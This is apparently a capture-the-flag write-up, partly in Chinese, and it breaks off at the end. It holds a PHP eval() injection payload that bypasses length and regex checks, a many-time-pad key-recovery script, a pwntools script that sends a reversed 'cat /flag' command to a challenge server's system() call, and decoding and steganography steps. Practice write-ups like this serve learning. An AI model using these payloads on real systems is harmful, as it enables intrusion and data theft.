1
strlen()长度要与exam的相同(return'71f158cb1d484b7a54f6c004b943687c4c66015';长49)
需要同时满足正则匹配和后面的 === 强比较条件,考虑绕过:
eval() 会执行 PHP 代码;除 <?php ?> 外,还可以使用短标签 <? ?> 和 <?= ?>(代码结束必须有;)。根本问题在于用户输入被直接交给 eval(),长度和正则检查并不能使其安全。
?flag=
$a='fla1';$a{3}='g';?><?=$$a;?>111111111111111111
其中'可以用%27(url编码)
2
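import codecs

import Crypto.Util.strxor as xo
import libnum
import numpy as np

# Many-time-pad analysis. Every line of Problem.txt is a hex-encoded
# ciphertext, and the script treats them as XORed with one shared keystream:
# XORing two ciphertexts then cancels the key and leaves m_i ^ m_j.
# A space XORed with a letter gives a letter again (case flipped), so a
# position whose XOR against most other ciphertexts is alphabetic is probably
# a space in that message. The weakness being demonstrated is keystream
# reuse; a fresh key or nonce per message removes it.
#
# Assumes all ciphertexts have the same length (strxor requires it) -- TODO
# confirm against the challenge file.


def isChr(x):
    """Return True when byte value *x* is an ASCII letter (A-Z or a-z)."""
    return ord('a') <= x <= ord('z') or ord('A') <= x <= ord('Z')


def _propagate(index, pos, value):
    """Record plaintext byte *value* at (index, pos) and derive that column
    for every other message."""
    msg[index, pos] = value
    for other in range(len(c)):
        if other != index:
            # c[other] ^ c[index] == m[other] ^ m[index]; XOR with the known
            # byte leaves m[other]. Indexing the bytes directly avoids
            # XORing the whole ciphertext for a single position.
            msg[other][pos] = c[other][pos] ^ c[index][pos] ^ value


def infer(index, pos):
    """Guess that message *index* has a space at *pos*, unless already set.

    A zero in ``msg`` means "not recovered yet", so earlier (higher-scored)
    guesses are never overwritten by later ones.
    """
    if msg[index, pos] != 0:
        return
    _propagate(index, pos, ord(' '))


def know(index, pos, ch):
    """Force character *ch* at (index, pos); used for manual corrections."""
    _propagate(index, pos, ord(ch))


dat = []


def getSpace():
    """Score every (message, position) pair by how many pairwise XORs are
    letters there, appending ``(score, index, pos)`` to ``dat``."""
    for index, x in enumerate(c):
        res = [xo.strxor(x, y) for y in c if x != y]
        for pos in range(len(x)):
            # Counted once per position (the original computed it twice).
            letters = sum(1 for s in res if isChr(s[pos]))
            dat.append((letters, index, pos))


# Close the file deterministically and skip blank lines, which would decode
# to empty ciphertexts and break the equal-length XORs below.
with open('Problem.txt', 'r') as fh:
    c = [codecs.decode(line.strip().encode(), 'hex') for line in fh if line.strip()]
if not c:
    raise SystemExit('Problem.txt contains no ciphertexts')

# Recovered plaintext bytes, one row per ciphertext; 0 = unknown.
msg = np.zeros([len(c), len(c[0])], dtype=int)

getSpace()

# Apply the most confident space guesses first. The tuples are unique, so
# this ordering equals sorted(dat)[::-1].
dat = sorted(dat, reverse=True)
for w, index, pos in dat:
    infer(index, pos)

# Manual fixes for this particular challenge after reading the partial output.
know(10, 21, 'y')
know(8, 14, 'n')

print('\n'.join(''.join(chr(b) for b in row) for row in msg))

# Build the plaintext as raw bytes. Going through str.encode() would emit
# two UTF-8 bytes for any recovered value >= 0x80 and make strxor fail on
# the length mismatch.
key = xo.strxor(c[0], bytes(int(b) for b in msg[0]))
print(key)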
3
程序会把输入逆序读取,然后交给 system(),因此发送前先把命令反转:
from pwn import *
# Verbose pwntools logging so every byte sent and received is visible.
context(log_level='debug', os='linux')

# Challenge endpoint exactly as given in the write-up.
io = remote('node4.anna.nssctf.cn', 28299)

# The write-up notes that the service reads its input back to front before
# handing it to system(), so the command is sent reversed.
command = 'cat /flag'
payload = ''.join(reversed(command))

# Wait for the prompt, send the reversed command, then hand the session over
# to the terminal to read the reply.
io.sendlineafter('lleT:', payload)
io.interactive()
4
# Encoded string taken from the challenge (24 characters).
data = "xIrCj~<r|2tWsv3PtI\x7Fzndka"

# Each character decodes as (code point XOR 6) - 1; only the first 24
# characters are processed, which is the whole string here.
flag = "".join(chr((ord(ch) ^ 6) - 1) for ch in data[:24])
print(flag)

# Print the decoded text reversed as well; this is the readable orientation.
print("".join(reversed(flag)))
5
BMP改PNG文字头:(IHDR)
PNG图片,blue 0 通道发现JPG的字节流,不过是逆序的。P...P....Save Bin
保存出来后,使用Python简单处理即可
from binascii import *

# Read the extracted channel dump and reverse its hex text. Reversing the
# whole hex string also swaps the two nibbles of every byte.
with open('blue0', 'rb') as src:
    reversed_hex = hexlify(src.read())[::-1]

# Walk the reversed hex two characters at a time and flip each pair back, so
# the net effect is the original bytes in reverse order.
restored = b''.join(
    unhexlify(reversed_hex[off:off + 2][::-1])
    for off in range(0, len(reversed_hex), 2)
)

with open('flag.jpg', 'wb') as dst:
    dst.write(restored)
在得到的数据中,找到离文件尾 FF D9 最近的文件头 FF D8,
把这一段数据另存为 jpg,
即可得到fla